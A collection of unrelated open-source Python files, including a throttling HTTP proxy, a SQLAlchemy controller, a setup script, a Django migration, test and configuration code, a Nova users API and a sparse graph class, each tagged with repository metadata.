self.client.buffer.append(line + '\r\n')
def readable(self):
"""Check if this channel is ready to receive some data."""
return len(self.client.buffer) == 0
def handle_read(self):
"""Read some data from the server."""
data = self.recv(8192)
if not self.header.complete:
data = self.header.append(data)
if self.header.complete:
if options.dump_recv_headers:
self.header.dump(self.addr, self.client.addr, 'receiving')
self.receive_header(self.header)
if self.header.complete and len(data):
if options.dump_recv_content:
self.header.dump_content(
data, self.addr, self.client.addr, 'receiving')
self.client.buffer.append(data)
def handle_connect(self):
"""Print connect message to stderr."""
debug("server %s:%d connected" % self.addr)
def handle_close(self):
"""Print disconnect message to stderr."""
self.close()
debug("server %s:%d disconnected" % self.addr)
if self.header.extract('Connection').lower() == 'close':
self.client.should_close = True
self.client.check_close()
class ProxyServer(asyncore.dispatcher):
"""Listen for client connections."""
def __init__(self):
asyncore.dispatcher.__init__(self)
self.download_throttle = Throttle(options.download)
self.upload_throttle = Throttle(options.upload)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.addr = (options.interface, options.port)
self.bind(self.addr)
self.listen(5)
debug("listening on %s:%d" % self.addr)
def readable(self):
debug('%8.1f kbps up %8.1f kbps down\r' % (
self.upload_throttle.real_kbps(),
self.download_throttle.real_kbps(),
), newline=False)
return True
def handle_accept(self):
"""Accept a new connection from a client."""
channel, addr = self.accept()
if addr[0] == '127.0.0.1' or options.allow_remote:
ClientChannel(channel, addr,
self.download_throttle, self.upload_throttle)
else:
channel.close()
debug("remote client %s:%d not allowed" % addr)
if __name__ == '__main__':
from optparse import OptionParser
version = '%prog ' + __revision__.strip('$').replace('Rev: ', 'r')
parser = OptionParser(version=version)
parser.add_option('-i', dest='interface', action='store', type='string',
metavar='<ip>', default='',
help="listen on this interface only (default all)")
parser.add_option('-p', dest='port', action='store', type='int',
metavar='<port>', default=8080,
help="listen on this port number (default 8080)")
parser.add_option('-d', dest='download', action='store', type='float',
metavar='<kbps>', default=28.8,
help="download bandwidth in kbps (default 28.8)")
parser.add_option('-u', dest='upload', action='store', type='float',
metavar='<kbps>', default=28.8,
help="upload bandwidth in kbps (default 28.8)")
parser.add_option('-o', dest='allow_remote', action='store_true',
help="allow remote clients (WARNING: open proxy)")
parser.add_option('-q', dest='quiet', action='store_true',
help="don't show connect and disconnect messages")
parser.add_option('-s', dest='dump_send_headers', action='store_true',
help="dump headers sent to server")
parser.add_option('-r', dest='dump_recv_headers', action='store_true',
help="dump headers received from server")
parser.add_option('-S', dest='dump_send_content', action='store_true',
help="dump content sent to server")
parser.add_option('-R', dest='dump_recv_content', action='store_true',
help="dump content received from server")
parser.add_option('-l', dest='text_dump_limit', action='store',
metavar='<bytes>', type='int', default=1024,
help="maximum length of dumped text content (default 1024)")
parser.add_option('-L', dest='data_dump_limit', action='store',
metavar='<bytes>', type='int', default=256,
help="maximum length of dumped binary content (default 256)")
parser.add_option('-g', dest='gzip_size_limit', action='store',
metavar='<bytes>', type='int', default=8192,
help="maximum size for gzip decompression (default 8192)")
options, args = parser.parse_args()
proxy = ProxyServer()
try:
asyncore.loop(timeout=0.1)
except:
proxy.shutdown(2)
proxy.close()
raise
| foligny/browsershots-psycopg2 | throxy/throxy.py | Python | gpl-3.0 | 19,293 | 0.001451 |
import logging
from datetime import timezone
import dateutil.parser
from sqlalchemy import and_, or_
from werkzeug.exceptions import Forbidden, NotFound, Unauthorized
from jarr.bootstrap import Base, session
logger = logging.getLogger(__name__)
def cast_to_utc(dt_obj):
dt_obj = dateutil.parser.parse(dt_obj)
if not dt_obj.tzinfo:
return dt_obj.replace(tzinfo=timezone.utc)
return dt_obj
class AbstractController:
_db_cls = Base # reference to the database class, to redefine in child cls
_user_id_key = 'user_id'
def __init__(self, user_id=None, ignore_context=False):
"""
        Base methods for controllers across JARR.
        User id is a right management mechanism that should be used to
        filter objects in the database on their denormalized "user_id" field
        (or "id" field for users).
        Should no user_id be provided, the Controller won't apply any filter,
        allowing for a kind of "super user" mode.
"""
if self._db_cls is None:
raise NotImplementedError("%r _db_cls isn't overridden" % self)
try:
self.user_id = int(user_id)
except TypeError:
self.user_id = user_id
@staticmethod
def _to_comparison(key, model):
"""Extract from the key the method used by sqla for comparison."""
if '__' not in key:
return getattr(model, key).__eq__
attr, ope = key.rsplit('__', 1)
if ope == 'nin':
return getattr(model, attr).notin_
if ope == 'in':
return getattr(model, attr).in_
if ope not in {'like', 'ilike'}:
ope = '__%s__' % ope
return getattr(getattr(model, attr), ope)
@classmethod
def _to_filters(cls, **filters):
"""
Will translate filters to sqlalchemy filter.
This method will also apply user_id restriction if available.
        Each parameter of the function is treated as an equality unless its
        name ends with one of the suffixes "__gt", "__lt", "__ge", "__le",
        "__ne", "__in", "__nin", "__like" or "__ilike".
"""
db_filters = set()
for key, value in filters.items():
if key == '__or__':
db_filters.add(or_(*[and_(*cls._to_filters(**sub_filter))
for sub_filter in value]))
elif key == '__and__':
for sub_filter in value:
for k, v in sub_filter.items():
db_filters.add(cls._to_comparison(k, cls._db_cls)(v))
else:
db_filters.add(cls._to_comparison(key, cls._db_cls)(value))
return db_filters
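    # A hypothetical illustration of the suffix DSL above, assuming a model
    # with `title`, `date` and `id` columns:
    #
    #     cls._to_filters(title__ilike='%python%', date__lt=some_date,
    #                     id__in=[1, 2, 3])
    #
    # translates to Model.title.ilike('%python%'), Model.date < some_date and
    # Model.id.in_([1, 2, 3]) respectively.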
def _get(self, **filters):
"""
Abstract get.
        Will add the current user id to the filters if it is not None (a None
        user id means the code has decided the query shouldn't be user
        dependent) and the filters don't already contain a filter for that
        user.
"""
if self._user_id_key is not None and self.user_id \
and filters.get(self._user_id_key) != self.user_id:
filters[self._user_id_key] = self.user_id
return session.query(self._db_cls).filter(*self._to_filters(**filters))
def get(self, **filters):
"""Will return one single objects corresponding to filters"""
obj = self._get(**filters).first()
if obj and not self._has_right_on(obj):
            raise Forbidden('Not authorized to access %r (%r)' % (
self._db_cls.__class__.__name__, filters))
if not obj:
raise NotFound('No %r (%r)' % (self._db_cls.__class__.__name__,
filters))
return obj
def create(self, **attrs):
if not attrs:
raise ValueError("attributes to update must not be empty")
if self._user_id_key is not None and self._user_id_key not in attrs:
attrs[self._user_id_key] = self.user_id
if not (self._user_id_key is None or self._user_id_key in attrs
or self.user_id is None):
raise Unauthorized("You must provide user_id one way or another")
obj = self._db_cls(**attrs)
session.add(obj)
session.flush()
session.commit()
return obj
def read(self, **filters):
return self._get(**filters)
def update(self, filters, attrs, return_objs=False, commit=True):
if not attrs:
logger.error("nothing to update, doing nothing")
result, commit = {}, False
else:
result = self._get(**filters).update(attrs,
synchronize_session=False)
if commit:
session.flush()
session.commit()
if return_objs:
return self._get(**filters)
return result
def delete(self, obj_id, commit=True):
obj = self.get(id=obj_id)
session.delete(obj)
if commit:
session.flush()
session.commit()
return obj
def _has_right_on(self, obj):
# user_id == None is like being admin
if self._user_id_key is None:
return True
return self.user_id is None \
or getattr(obj, self._user_id_key, None) == self.user_id
def assert_right_ok(self, obj_id):
if not self.user_id:
raise ValueError("%r user_id can't be None" % self)
rows = self.__class__().read(id=obj_id).with_entities(
getattr(self._db_cls, self._user_id_key)).first()
if not rows:
raise NotFound()
if not rows[0] == self.user_id:
raise Forbidden()
| jaesivsm/pyAggr3g470r | jarr/controllers/abstract.py | Python | agpl-3.0 | 5,796 | 0.000173 |
#! /usr/bin/env python
from distutils.core import setup, Extension
from distutils.util import get_platform
import shutil
import os, sys
def build_all():
packages=['miasm2',
'miasm2/arch',
'miasm2/arch/x86',
'miasm2/arch/arm',
'miasm2/arch/aarch64',
'miasm2/arch/msp430',
'miasm2/arch/sh4',
'miasm2/arch/mips32',
'miasm2/core',
'miasm2/expression',
'miasm2/ir',
'miasm2/ir/translators',
'miasm2/analysis',
'miasm2/os_dep',
'miasm2/jitter',
'miasm2/jitter/arch',
'miasm2/jitter/loader',
]
ext_modules_no_tcc = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
]
ext_modules_all = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jittcc",
["miasm2/jitter/Jittcc.c"],
libraries=["tcc"])
]
print 'building'
build_ok = False
for name, ext_modules in [('all', ext_modules_all),
('notcc', ext_modules_no_tcc)]:
print 'build with', repr(name)
try:
s = setup(
name = 'Miasm',
version = '2.0',
packages = packages,
package_data = {'miasm2':['jitter/*.h',
'jitter/arch/*.h',]},
ext_modules = ext_modules,
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
except SystemExit, e:
print repr(e)
continue
build_ok = True
break
if not build_ok:
raise ValueError('Unable to build Miasm!')
print 'build', name
if name == 'notcc':
print
print "*"*80
print "Warning: TCC is not properly installed,"
print "Miasm will be installed without TCC Jitter"
print "Etheir install TCC or use LLVM jitter"
print "*"*80
print
# we copy libraries from build dir to current miasm directory
build_base = None
if 'build' in s.command_options:
if 'build_base' in s.command_options['build']:
build_base = s.command_options['build']['build_base']
if build_base is None:
build_base = "build"
plat_specifier = ".%s-%s" % (get_platform(), sys.version[0:3])
build_base = os.path.join('build','lib' + plat_specifier)
print build_base
def build_no_tcc():
setup(
name = 'Miasm',
version = '2.0',
packages=['miasm2', 'miasm2/tools',
'miasm2/expression', 'miasm2/graph', 'miasm2/arch',
'miasm2/core', 'miasm2/tools/emul_lib' ],
package_data = {'miasm2':['tools/emul_lib/*.h']},
# data_files = [('toto', ['miasm2/tools/emul_lib/queue.h'])],
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
def try_build():
    build_all()
    """
    try:
        build_all()
        return
    except:
        print "WARNING: cannot build with libtcc, trying without it"
        print "Miasm will not be able to emulate code"
        build_no_tcc()
    """
try_build()
| chubbymaggie/miasm | setup.py | Python | gpl-2.0 | 6,252 | 0.006718 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ictus', '0028_auto_20161212_1316'),
]
operations = [
migrations.AlterField(
model_name='basal',
name='alcohol',
field=models.IntegerField(null=True, choices=[('00', 'No'), ('01', 'A diario'), ('02', 'Ocasionalmente'), ('03', 'Exhabito enólico')], blank=True, verbose_name='Alcohol'),
),
migrations.AlterField(
model_name='basal',
name='tabaquismo',
field=models.IntegerField(null=True, choices=[('00', 'No fumador'), ('01', 'Exfumador'), ('02', 'Fumador pasivo'), ('03', 'Fumador actual'), ('04', 'Desconocido')], blank=True, verbose_name='Tabaco'),
),
]
| NavarraBiomed/seguimientoPacientes | ictus/migrations/0029_auto_20161212_1316.py | Python | gpl-2.0 | 852 | 0.00235 |
from typing import List
class Message(object):
class Origin(object):
servername: str
nickname: str
username: str
hostname: str
command: str
origin: Origin
params: List[str]
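# A hypothetical mapping from a raw IRC line onto this structure (the line is
# illustrative; the actual parsing lives elsewhere in labots):
#
#     ":nick!user@host PRIVMSG #chan :hello" ->
#         origin.nickname = "nick", origin.username = "user",
#         origin.hostname = "host", command = "PRIVMSG",
#         params = ["#chan", "hello"]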
| LastAvenger/labots | labots/common/message.py | Python | gpl-3.0 | 223 | 0.004484 |
# -*- coding:utf-8 -*-
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
volume = test_lib.lib_get_specific_stub('e2e_mini/volume', 'volume')
volume_ops = None
vm_ops = None
volume_name = 'volume-' + volume.get_time_postfix()
backup_name = 'backup-' + volume.get_time_postfix()
def test():
global volume_ops
volume_ops = volume.VOLUME()
vm = test_lib.lib_get_specific_stub(suite_name='e2e_mini/vm', specific_name='vm')
vm_ops = vm.VM(uri=volume_ops.uri, initialized=True)
vm_ops.create_vm()
volume_ops.create_volume(volume_name)
volume_ops.volume_attach_to_vm(vm_ops.vm_name)
volume_ops.create_backup(volume_name, 'volume', backup_name)
vm_ops.vm_ops(vm_ops.vm_name, action='stop')
volume_ops.restore_backup(volume_name, 'volume', backup_name)
volume_ops.delete_backup(volume_name, 'volume', backup_name)
volume_ops.check_browser_console_log()
test_util.test_pass('Test Volume Create, Restore and Delete Backups Successful')
def env_recover():
global volume_ops
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
#Will be called only if exception happens in test().
def error_cleanup():
global volume_ops
try:
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
except:
pass
| zstackio/zstack-woodpecker | integrationtest/vm/e2e_mini/volume/test_volume_backup.py | Python | apache-2.0 | 1,389 | 0.00432 |
# Copyright 2016 Sotera Defense Solutions Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import six
if six.PY2:
    from ConfigParser import SafeConfigParser
else:
    from configparser import SafeConfigParser
class AggregateMicroPathConfig:
config_file = ""
table_name = ""
table_schema_id = ""
table_schema_dt = ""
table_schema_lat = ""
table_schema_lon = ""
time_filter = 0
distance_filter = 0
tripLat1 = 0
tripLon1 = 0
tripLat2 = 0
tripLon2 = 0
tripname = ""
resolutionLat = 0
resolutionLon = 0
tripLatMin = 0
tripLatMax = 0
tripLonMin = 0
tripLonMax = 0
triplineBlankets = []
def __init__(self, config, basePath = "./"):
configParser = SafeConfigParser()
configParser.read(basePath + config)
self.config_file = config
self.database_name = configParser.get("AggregateMicroPath", "database_name")
self.table_name = configParser.get("AggregateMicroPath", "table_name")
self.table_schema_id = configParser.get("AggregateMicroPath", "table_schema_id")
self.table_schema_dt = configParser.get("AggregateMicroPath", "table_schema_dt")
self.table_schema_lat = configParser.get("AggregateMicroPath", "table_schema_lat")
self.table_schema_lon = configParser.get("AggregateMicroPath", "table_schema_lon")
        self.time_filter = int(configParser.get("AggregateMicroPath", "time_filter"))
        self.distance_filter = int(configParser.get("AggregateMicroPath", "distance_filter"))
self.tripLat1 = float(configParser.get("AggregateMicroPath", "lower_left_lat"))
self.tripLon1 = float(configParser.get("AggregateMicroPath", "lower_left_lon"))
self.tripLat2 = float(configParser.get("AggregateMicroPath", "upper_right_lat"))
self.tripLon2 = float(configParser.get("AggregateMicroPath", "upper_right_lon"))
self.tripname = configParser.get("AggregateMicroPath", "trip_name")
self.resolutionLat = float(configParser.get("AggregateMicroPath", "resolution_lat"))
self.resolutionLon = float(configParser.get("AggregateMicroPath", "resolution_lon"))
self.tripLatMin = int(math.floor(self.tripLat1/self.resolutionLat))#6
self.tripLatMax = int(math.ceil(self.tripLat2/self.resolutionLat)) #7
self.tripLonMin = int(math.floor(self.tripLon1/self.resolutionLon)) #8
self.tripLonMax = int(math.ceil(self.tripLon2/self.resolutionLon)) #9
self.triplineBlankets.append([self.tripLat1,self.tripLon1,self.tripLat2,self.tripLon2,self.tripname,self.resolutionLat,self.resolutionLon,self.tripLatMin,self.tripLatMax,self.tripLonMin,self.tripLonMax])
self.temporal_split = configParser.get("AggregateMicroPath", "temporal_split")
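# A worked example of the grid maths above (values are illustrative): with
# lower_left_lat = 38.80 and resolution_lat = 0.01, tripLatMin is
# floor(38.80 / 0.01) = 3880, and with upper_right_lat = 38.92 tripLatMax is
# ceil(38.92 / 0.01) = 3892, giving 12 cells of latitude in the blanket.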
| Sotera/aggregate-micro-paths | hive-streaming/conf/config.py | Python | apache-2.0 | 3,321 | 0.016561 |
"""
WSGI config for alex project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "alex.settings")
application = get_wsgi_application()
| xualex/DjangoTutorial | alex/alex/wsgi.py | Python | mit | 386 | 0 |
################################################################################
# This is a Cate configuration file. #
# #
# If this file is "~/.cate/conf.py", it is the active Cate configuration. #
# #
# If this file is named "conf.py.template" you can rename it and move #
# it "~/.cate/conf.py" to make it the active Cate configuration file. #
# #
# As this is a regular Python script, you may use any Python code to compute #
# the settings provided here. #
# #
# Please find the configuration template for a given Cate VERSION at #
# https://github.com/CCI-Tools/cate/blob/vVERSION/cate/conf/template.py #
# For example: #
# https://github.com/CCI-Tools/cate/blob/v2.0.0.dev4/cate/conf/template.py #
################################################################################
# 'data_stores_path' denotes a directory where Cate stores information about data stores and also saves
# local data files synchronized with their remote versions.
# Use the tilde '~' (also on Windows) within the path to point to your home directory.
#
# data_stores_path = '~/.cate/data_stores'
# 'dataset_persistence_format' names the data format to be used when persisting datasets in the workspace.
# Possible values are 'netcdf4' or 'zarr'.
# dataset_persistence_format = 'netcdf4'
# If 'use_workspace_imagery_cache' is True, Cate will maintain a per-workspace
# cache for imagery generated from dataset variables. Such cache can accelerate
# image display, however at the cost of disk space.
#
# use_workspace_imagery_cache = False
# Default prefix for names generated for new workspace resources originating from opening data sources
# or executing workflow steps.
# This prefix is used only if no specific prefix is defined for a given operation.
# default_res_pattern = 'res_{index}'
# User-defined HTTP proxy settings; these replace the value stored in the 'http_proxy' environment variable.
# Accepted proxy details formats:
# 'http://user:password@host:port'
# 'https://user:password@host:port'
# 'http://host:port'
# 'https://host:port'
# http_proxy =
# Include/exclude data sources (currently effective in Cate Desktop GUI only, not used by API, CLI).
#
# If 'included_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be included. By default, or if 'included_data_sources' is None, all data sources are included.
# If 'excluded_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be excluded. By default, or if 'excluded_data_sources' is None, no data sources are excluded.
# If both 'included_data_sources' and 'excluded_data_sources' are lists, we first include data sources using
# 'included_data_sources' then remove entries that match any result from applying 'excluded_data_sources'.
#
# We put wildcards here that match all data sources that are known to work in GUI
# included_ds_ids = []
# We put wildcards here that match all data sources that are known NOT to work in GUI
excluded_ds_ids = [
# Exclude datasets that usually take too long to download or cannot be easily aggregated
# e.g.
# 'esacci.*.day.*',
# 'esacci.*.satellite-orbit-frequency.*',
# 'esacci.LC.*',
]
# Configure names of variables that will be initially selected once a new
# dataset resource is opened in the GUI.
# default_variables = {
# 'cfc', # Cloud CCI
# 'lccs_class', # Land Cover CCI
# 'analysed_sst', # Sea Surface Temperature CCI
# }
# Configure / overwrite default variable display settings as used in various plot_<type>() operations
# and in the Cate Desktop GUI.
# Each entry maps a variable name to a dictionary with the following entries:
#   color_map - name of a color map taken from https://matplotlib.org/examples/color/colormaps_reference.html
# display_min - minimum variable value that corresponds to the lower end of the color map
# display_max - maximum variable value that corresponds to the upper end of the color map
#
# variable_display_settings = {
# 'my_var': dict(color_map='viridis', display_min=0.1, display_max=0.8),
# }
# Default color map to be used for any variable not configured in 'variable_display_settings'
# 'default_color_map' must be the name of a color map taken from
# https://matplotlib.org/examples/color/colormaps_reference.html
# default_color_map = 'jet'
default_color_map = 'inferno'
# Data Store Configurations
# Load from here the configurations of the data stores that will eventually be loaded into cate
store_configs = {
"local": {
"store_id": "directory",
"store_params": {
"base_dir": "",
}
},
"cci-store": {
"store_id": "cciodp"
},
"cds-store": {
"store_id": "cds"
}
}
| CCI-Tools/cate-core | cate/conf/template.py | Python | mit | 5,327 | 0.007509 |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova import exception
from nova import flags
from nova import log as logging
from nova.api.openstack import common
from nova.api.openstack import faults
from nova.auth import manager
FLAGS = flags.FLAGS
LOG = logging.getLogger('nova.api.openstack')
def _translate_keys(user):
return dict(id=user.id,
name=user.name,
access=user.access,
secret=user.secret,
admin=user.admin)
class Controller(common.OpenstackController):
_serialization_metadata = {
'application/xml': {
"attributes": {
"user": ["id", "name", "access", "secret", "admin"]}}}
def __init__(self):
self.manager = manager.AuthManager()
def _check_admin(self, context):
"""We cannot depend on the db layer to check for admin access
for the auth manager, so we do it here"""
if not context.is_admin:
raise exception.AdminRequired()
def index(self, req):
"""Return all users in brief"""
users = self.manager.get_users()
users = common.limited(users, req)
users = [_translate_keys(user) for user in users]
return dict(users=users)
def detail(self, req):
"""Return all users in detail"""
return self.index(req)
def show(self, req, id):
"""Return data about the given user id"""
#NOTE(justinsb): The drivers are a little inconsistent in how they
# deal with "NotFound" - some throw, some return None.
try:
user = self.manager.get_user(id)
except exception.NotFound:
user = None
if user is None:
raise faults.Fault(exc.HTTPNotFound())
return dict(user=_translate_keys(user))
def delete(self, req, id):
self._check_admin(req.environ['nova.context'])
self.manager.delete_user(id)
return {}
def create(self, req):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin') in ('T', 'True', True)
name = env['user'].get('name')
access = env['user'].get('access')
secret = env['user'].get('secret')
user = self.manager.create_user(name, access, secret, is_admin)
return dict(user=_translate_keys(user))
def update(self, req, id):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin')
if is_admin is not None:
is_admin = is_admin in ('T', 'True', True)
access = env['user'].get('access')
secret = env['user'].get('secret')
self.manager.modify_user(id, access, secret, is_admin)
return dict(user=_translate_keys(self.manager.get_user(id)))
| superstack/nova | nova/api/openstack/users.py | Python | apache-2.0 | 3,531 | 0.000283 |
from apgl.graph.AbstractMatrixGraph import AbstractMatrixGraph
from apgl.graph.AbstractVertexList import AbstractVertexList
from apgl.graph.GeneralVertexList import GeneralVertexList
from apgl.graph.VertexList import VertexList
from apgl.util.Util import Util
from apgl.util.SparseUtils import SparseUtils
from apgl.util.Parameter import Parameter
import scipy.sparse as sparse
import scipy.io
import numpy
class SparseGraph(AbstractMatrixGraph):
'''
Represents a graph, which can be directed or undirected, and has weights
on the edges. Memory usage is efficient for sparse graphs. The list of vertices
is immutable (see VertexList), however edges can be added or removed. Only
non-zero edges can be added. Uses scipy.sparse for the underlying matrix
representation.
'''
def __init__(self, vertices, undirected=True, W=None, dtype=numpy.float, frmt="csr"):
"""
Create a SparseGraph with a given AbstractVertexList or number of
vertices, and specify whether it is directed. One can optionally pass
in a sparse matrix W which is used as the weight matrix of the
graph. Different kinds of sparse matrix can impact the speed of various
operations. The currently supported sparse matrix types are: lil_matrix,
csr_matrix, csc_matrix and dok_matrix. The default sparse matrix is
csr_matrix.
        :param vertices: the initial set of vertices as an AbstractVertexList object, or an int to specify the number of vertices, in which case vertices are stored in a GeneralVertexList.
:param undirected: a boolean variable to indicate if the graph is undirected.
:type undirected: :class:`boolean`
:param W: a square sparse matrix of the same size as the number of vertices, or None to create the default one.
:param dtype: the data type of the sparse matrix if W is not specified.
:param frmt: the format of the sparse matrix: lil, csr or csc if W is not specified
"""
Parameter.checkBoolean(undirected)
if isinstance(vertices, AbstractVertexList):
self.vList = vertices
elif isinstance(vertices, int):
self.vList = GeneralVertexList(vertices)
else:
raise ValueError("Invalid vList parameter: " + str(vertices))
        if W is not None and not (sparse.issparse(W) and W.shape == (self.vList.getNumVertices(), self.vList.getNumVertices())):
raise ValueError("Input argument W must be None or sparse matrix of size " + str(self.vList.getNumVertices()) )
self.undirected = undirected
if frmt=="lil":
matrix = sparse.lil_matrix
elif frmt=="csr":
matrix = sparse.csr_matrix
elif frmt=="csc":
matrix = sparse.csc_matrix
else:
raise ValueError("Invalid sparse matrix format: " + frmt)
#Terrible hack alert: can't create a zero size sparse matrix, so we settle
#for one of size 1. Better is to create a new class.
        if self.vList.getNumVertices() == 0 and W is None:
            self.W = matrix((1, 1), dtype=dtype)
        elif W is None:
            self.W = matrix((self.vList.getNumVertices(), self.vList.getNumVertices()), dtype=dtype)
else:
self.W = W
#The next line is for error checking mainly
self.setWeightMatrix(W)
def neighbours(self, vertexIndex):
"""
Return an array of the indices of neighbours. In the case of a directed
graph it is an array of those vertices connected by an edge from the current
one.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all neigbours of the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
#neighbours = self.W[vertexIndex, :].nonzero()[1]
neighbours = self.W.getrow(vertexIndex).nonzero()[1]
#neighbours = numpy.nonzero(self.W.getrow(vertexIndex).toarray())[1]
return neighbours
def neighbourOf(self, vertexIndex):
"""
Return an array of the indices of vertices than have an edge going to the input
vertex.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all vertices with an edge towards the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
nonZeroInds = self.W[:, vertexIndex].nonzero()
neighbours = nonZeroInds[0]
return neighbours
def getNumEdges(self):
"""
:returns: the total number of edges in this graph.
"""
if self.getNumVertices()==0:
return 0
#Note that self.W.getnnz() doesn't seem to work correctly
if self.undirected == True:
return (self.W.nonzero()[0].shape[0] + numpy.sum(SparseUtils.diag(self.W) != 0))/2
else:
return self.W.nonzero()[0].shape[0]
def getNumDirEdges(self):
"""
:returns: the number of edges, taking this graph as a directed graph.
"""
return self.W.nonzero()[0].shape[0]
def outDegreeSequence(self):
"""
:returns: a vector of the (out)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(1), dtype=numpy.int32).ravel()
return degrees
def inDegreeSequence(self):
"""
:returns: a vector of the (in)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(0), dtype=numpy.int32).ravel()
return degrees
def subgraph(self, vertexIndices):
"""
Pass in a list or set of vertexIndices and returns the subgraph containing
those vertices only, and edges between them. The subgraph indices correspond
to the sorted input indices.
:param vertexIndices: the indices of the subgraph vertices.
:type vertexIndices: :class:`list`
:returns: A new SparseGraph containing only vertices and edges from vertexIndices
"""
Parameter.checkList(vertexIndices, Parameter.checkIndex, (0, self.getNumVertices()))
vertexIndices = numpy.unique(numpy.array(vertexIndices)).tolist()
vList = self.vList.subList(vertexIndices)
subGraph = SparseGraph(vList, self.undirected)
if len(vertexIndices) != 0:
subGraph.W = self.W[vertexIndices, :][:, vertexIndices]
return subGraph
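    # A small illustration of the index mapping noted above: for input
    # vertices [5, 2, 9] the subgraph is built over the sorted unique list
    # [2, 5, 9], so subgraph vertex 0 corresponds to original vertex 2,
    # vertex 1 to 5, and vertex 2 to 9.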
def getWeightMatrix(self):
"""
Return the weight matrix in dense format. Warning: should not be used
unless sufficient memory is available to store the dense matrix.
:returns: A numpy.ndarray weight matrix.
"""
if self.getVertexList().getNumVertices() != 0:
return self.W.toarray()
else:
return numpy.zeros((0, 0))
def getSparseWeightMatrix(self):
"""
Returns the original sparse weight matrix.
:returns: A scipy.sparse weight matrix.
"""
return self.W
def add(self, graph):
"""
Add the edge weights of the input graph to the current one. Results in a
union of the edges.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with same vertex list and addition of edge weights
"""
Parameter.checkClass(graph, SparseGraph)
